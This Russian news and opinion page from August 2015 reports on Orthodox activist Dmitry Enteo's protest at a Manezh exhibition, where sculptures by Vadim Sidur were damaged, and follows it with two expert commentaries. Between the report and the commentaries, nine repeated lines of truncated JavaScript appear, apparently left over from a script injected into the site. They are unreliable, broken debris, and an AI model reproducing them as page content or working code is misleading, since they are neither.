17 августа 2015

АКЦИОНИЗМ

Скандал на выставке в Манеже
Фото: ссылка
АКЦИОНИЗМ - форма современного искусства, возникшая в 1960-е годы в Западной Европе. В акционизме художник как правило становится субъектом и/или объектом художественного произведения. Близкими к акционизму формами являются хэппенинг, перформанс, эвент, искусство действия, искусство демонстрации и ряд других форм.
Википедия

В минувшую пятницу группа активистов во главе с лидером движения "Божья воля" Дмитрием Цорионовым - Энтео устроили акцию протеста в московском Манеже. Прийдя на выставку "Скульптуры, которых мы не видим", на которой были представлены работы в жанре подвального нонконформизма 1954–1968 годов активисты заявили, что выставка оскорбляет чувства верующих, и привели в пример одну из работ, изображающую Иисуса Христа в ненадлежащем виде. По словам участников акции, экспозиция нарушает закон УК РФ "О защите чувств верующих".

В ходе акции протеста пострадали несколько работ, в их числе скульптура Вадима Сидура "Снятие с креста".

Представители выставочного зала "Манеж" подали заявление в полицию в связи с действиями движения "Божья воля" и будут добиваться возбуждения уголовного дела против нарушителей. В свою очередь основатель движения «Божья воля» Дмитрий Цорионов считает, что организаторы выставки в Манеже должны понести уголовную ответственность за свои действия, о чём заявил в интервью «Коммерсантъ FM».

Рис. Геннадия Животова

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Экспертные оценки

Такие гении зла, как Энтео, тихо и неспешно выполняют свою сакральную миссию. Они сдерживают беспредельное своеволие творческой личности.

Думаю, что со мной согласятся все, что люди искусства с недавних пор вообще обнаглели и перестали ощущать связь с вдохновляющим их божественным началом. То есть художник не готов ответить своей жизнью, судьбой и экзистенцией за то, что он создает. А если так, то он не художник, а в лучшем случае примитивный дизайнер-креативщик. То есть ремесленник.

Если так пойдет и дальше - я имею в виду не контролируемый никакими идеологическими или религиозными рамками эстетический беспредел - то мы по всем законам метафизики придем к распаду и хаосу.

Сегодня, в ситуации вопиющей инфляции искусства и при полнейшей безответственности художника нужен не один Энтео, а целые отряды его сторонников, которым должен быть официально предоставлен абсолютный и круглосуточный доступ в мастерские художников.

По большому счету Энтео - уже вчерашний день. Задачи такого типа народных кураторов культуры - не выявлять частности, а мониторить художественное пространство на предмет более широкого спектра проблем. Такие бригады вежливых людей могли бы периодически посещать творческие лаборатории именитых личностей, чтобы проверить
1) насколько замыслы мастеров искусств дерзновенны и соответствуют историческим свершениям и потенциалу России XXI века,
2) насколько национально идентифицировано их творчество и в чем оно может быть противопоставлено западному искусству и более того - превосходить его по убедительности.
И наконец самое главное - 3) соответствуешь ли ты, вошь, тля, червь и микроб, тем задачам, которые пытаешься воплотить в жизнь и не дай Бог не профанируешь ли ты сакральные начала мироздания.

И пусть отныне каждый «творец» прежде чем нанести очередной мазок или написать несколько слов - глубоко задумается. Соответствует ли его миссия пребывания на земле тому, чем он занимается и, в первую очередь, качеству его произведений.

Огромный скандал, который возник вокруг Энтео и работ Сидура, если его рассмотреть не через очки политических страстей довольно любопытен в социокультурном отношении. Мне очень понравилось выражение Константина Крылова: «Одно произведение современного искусства напало на другое произведение современного искусства». Многие годы так называемые художники-актуалисты тиранили общество своими провокациями. В основном, занимался этим круг галериста Марата Гельмана. Он пас художников-провокаторов, найдя в достаточно аморфном, отстранённом обществе нерв, связанный с православной культурой. Реакция православной среды была разной: от глухого недовольства и отрицания до акций прямого действия, когда люди из приходов действительно громили провокационные выставки и вызывали на себя гнев прокуратуры.

Так или иначе, сейчас мы пришли к совершенно новому раскладу, когда внутри коллективного Гельмана завёлся ещё один Гельман. То есть против художников-акционистов вышел акционист православный, известный как Дмитрий Энтео. Мы получили Гельмана внутри Гельмана. И внутри большого Гельмана завёлся червяк, который изгрызёт его изнутри. Поскольку Энтео имеет весьма отдалённое отношение к религиозной культуре, духовному деланию, как и так называемые «современные художники» весьма далеки от подлинного искусства.

Что же касается самого Сидура, на которого поднял руку Цорионов, то эта фигура достаточно вторична и не является знаковой в среде богохульников. Именно этот факт придаёт акции дополнительное странное звучание, потому что Вадим Сидур представляет не воинствующих безбожников, а некое культурное наследие, на которое напал «православный акционист» Энтео. Что ещё больше усугубляет раскол общества и возводит бесовские страсти на какой-то новый уровень. Таким образом, эта борьба со злом ведёт к ещё большему злу.

У Пушкина есть такая строчка: «Бывают странные сближенья». Вспомним 62-й год, Никита Сергеевич Хрущёв приходит в Манеж, видит произведения так называемого авангарда и обзывает нехорошим словом художников. Далее в 1974 году происходит бульдозерная выставка, которая до сих пор известна не потому, что выставка, а потому что «бульдозерная» - неких нонконформистов разогнала милиция с привлечением поливочных машин и бульдозеров. И наконец, 2015 год, уже «православные активисты» от лица народа или от лица всех православных устраивают акцию в том же самом Манеже, где полвека назад выступил Хрущёв. Интересный момент: убеждённый атеист Хрущёв имел определённое мнение о художниках-нонконформистах, но и религиозный фанатик Энтео фактически разделяет его мнение. Если такие разные персонажи имеют одно чёткое мнение, как мне кажется, проблема в самом искусстве.

Вместе с тем, как человек с юридическим образованием, я не приветствую подобных акций, потому что их можно квалифицировать как хулиганство и вандализм. Поэтому отношение отношением, но реакция должна быть адекватной. Как человек, я понимаю Энтео, потому что мне тоже не нравится подобное скотство, но как юрист - осуждаю.

1.0x